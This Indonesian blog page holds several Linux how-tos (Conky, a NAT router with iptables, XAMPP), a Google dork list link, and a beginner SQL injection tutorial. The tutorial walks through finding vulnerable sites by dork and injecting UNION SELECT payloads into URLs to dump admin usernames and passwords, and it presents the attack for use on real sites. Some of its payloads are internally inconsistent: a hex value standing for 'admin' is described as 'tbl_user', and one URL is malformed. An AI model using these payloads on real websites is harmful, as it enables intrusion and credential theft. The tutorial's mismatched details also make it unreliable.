Jumat, Juni 29

Install & Konfigurasi Conky

install Conky di ubuntu 12.04 :

1. buka terminal, masuk ke root : --> sudo su
2. ketikkan sudo apt-get install conky
3. tunggu beberapa saat..
4. install completed



konfigurasi Conky :

1.buka terminal
2.ketik --> sudo gedit /etc/conky/conky.conf
3.source nya sialkan Download disini
4.copy-paste source nya, trus save.
5.buka conky, alt+F2 ketik conky

Tidak ada komentar:

Membuat Router-Client dengan OS Linux

Membuat router-client di Ubuntu :

sediakan :
1.kabel LAN
2.dua buah laptop dengan OS linux

ayo langsung ke TKP :

1.sambungkan kedua lan tersebut ke laptop
2.seting di laptop untuk router :
 a). buka terminal masuk ke root dengan ketik : sudo su
 b). ketik -->ifconfig eth0 192.168.1.3/24 (untuk gateway client)
 c). setelah itu setting DNS degan cara --> echo "nameserver 8.8.8.8" > /etc/resolv.conf (disini saya menggunakan DNS google)
 d). setting ip forward --> echo "1" > /proc/sys/net/ipv4/ip_forward
 e). kemudian ketik --> iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

3.setting di laptop client :
 a). buka terminal masuk ke root lagi
 b). ifconfig eth0 192.168.1.4/24 (disini harus menggunakan segmen yang sama yaitu "1")
 c). kemudian --> route add default gw 192.168.1.3 (ip nya ke laptop router)
 d). setting DNS laptop client --> echo "nameserver 8.8.8.8" > /etc/resolv.conf

4.tes ping ke google.com

Tidak ada komentar:

Rabu, Juni 20

List GoogleDork

share list googleDork Download disini



sumber : www.breakthesecurity.com/2010/12/hacking-website-using-sql-injection.html
Tidak ada komentar:

INSTALL XAMPP DI Ubuntu

INSTALL XAMPP di Ubuntu

1.Download file nya di Xampp Download

2. Setelah download selesai, Move dulu file xampp tadi ke direktori Home biar lebih mudah...

3. Buka terminal anda, lalu masukkan ke root :~$ sudo su

4. Ekstrak file tar xampp ke direktori /opt, dengan cara :- tar xvfz xampp-linux-1.8.0.tar.gz -C /opt

5. Tunggu sampai selesai,kemudian tinggal jalankan xampp tersebut,dengan cara : /opt/lampp/lampp start

6. jika sudah,tutup terminal anda, terus buka firefox anda ! Lalu ketikkan : localhost/xampp
Tidak ada komentar:

SQL INJECTION PEMULA

     SQL injection adalah suatu istilah trik sederhana yang paling sering di gunakan oleh para h**ker untuk mengambil username & password sebuah website. Dan ini adalah sedikit tutorial dari saya untuk anda :)

tanpa banyak intermezzo let's go ke TKP :

yang perlu di siapkan sebelum menginjeksi :

 - Firefox
 - plugin hackbar di mozzila (ini untuk mengkonversikan String menjadi Hexa)
 - target website   


1.pertama kita cari target yang ingin di injek dengan cara googleDork:
  
  - googleDork : inurl: "product.php?id="

  (disini target saya : www.sasaran.com/index.php?id=130 )

2.Setelah itu, kita cari kelemahan webiste nya dengan cara memberikan tanda petik satu/quote ' di ujung URL,
 
  - www.sasaran.com/index.php?id=130'

jika ada kelemahan maka akan muncul tulisan seperti ini :

_query error: Resource id #3You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by id' at line 1

3. kemudian kita cari jumlah kolom :

 - www.sasaran.com/index.php?id=-130+order+by+1--
 (cari dimana pesan errornya,jika pesan error nya tidak muncul, cari lagi hingga muncul pesan error)

 - www.sasaran.com/index.php?id=-130+order+by+1--
 - www.sasaran.com/index.php?id=-130+order+by+2--
 - www.sasaran.com/index.php?id=-130+order+by+3--
 - www.sasaran.com/index.php?id=-130+order+by+4--
 - www.sasaran.com/index.php?id=-130+order+by+5--
 
 Unknown column ’5′ in ‘order clause’ <------------ nih pesan errornya

(naahhh muncul pesan errornya)

4. jika errornya muncul pada angka 5, jadi jumlah kolomnya 5-1= 4 :D ...

5. cek lagi kolom yang bisa di injek :
   - www.sasaran.com/index.php?id=-130+union+select+1,2,3,4--
    misalnya muncul angka, 1, 3 (nggak harus 1 & 3 yang muncul).

6. pilih salah satu angkanya disini saya pilih angka 3. kemudian cek mysql yang di pakai website tersebut :

 - www.sasaran.com/index.php?id=-130+union+select+1,2,version(),4--
   (ganti angka yang kita pilih dengan "version()" )
 - nih pesannya : "5.0.95-community"
7. bearti wesite tersebut menggunakan mysql versi 5, mysql versi 5 lebih mudah kita injek, untuk versi 4 mungkin lebih susah :)

8. kita cek lagi, (bosan ya nge-Cek terus).. hehhe, cek jumlah tabel dari databasenya dengan menambah kan "group_concat(table_name)" di angka  yang kita pilih tadi :

 - www.sasaran.com/index.php?id=-130+union+all+select+1,2,group_concat(table_name),4--

 - jangan lupa tambahkan juga "from+information_schema.tables+where+table_schema=database()--" jadi di URL nya seperti ini :
 - www.sasaran.com/index.php?id=-130+union+all+select+1,2,group_concat(table_name),4 +from+information_schema.tables+where+table_schema=database()--

9. jreeeeeenngggggggggg, muncul nama tabelnya : "

"tbl_user,tbl_barang,tbl_penjual"
10. lihat tabel  mana yang menarik untuk anda lihat : (pastinya tabel tbl_user)
    sebelum kita ke step selanjutnya, kita convert dulu "tbl_user" ke hexadecimal, untuk cara mengkonvertnya cari di google :)

- www.sasaran.com/index?php=-130+union+select+group_concat(column_name,0x3a)from+information_schema.columns+where+table_name=0x61646d696e--
naaahhh, muncul deh kolom-kolom dari tabel "tbl_user" :
misalnya ada muncul kolom USERNAME & PASSWORD

11. Ayo kita bongkar lagi kolom username & password nya :)

- www.sasaran.com/index.php?id=-130+union+select+group_concat(username,0x3a,password)from+admin--

12. jeeeeng jeeeeeeeeenggg.... muncul deh username & passwordnya selamat menjadi ADMIN :)






















Tidak ada komentar:
Langganan: Postingan (Atom)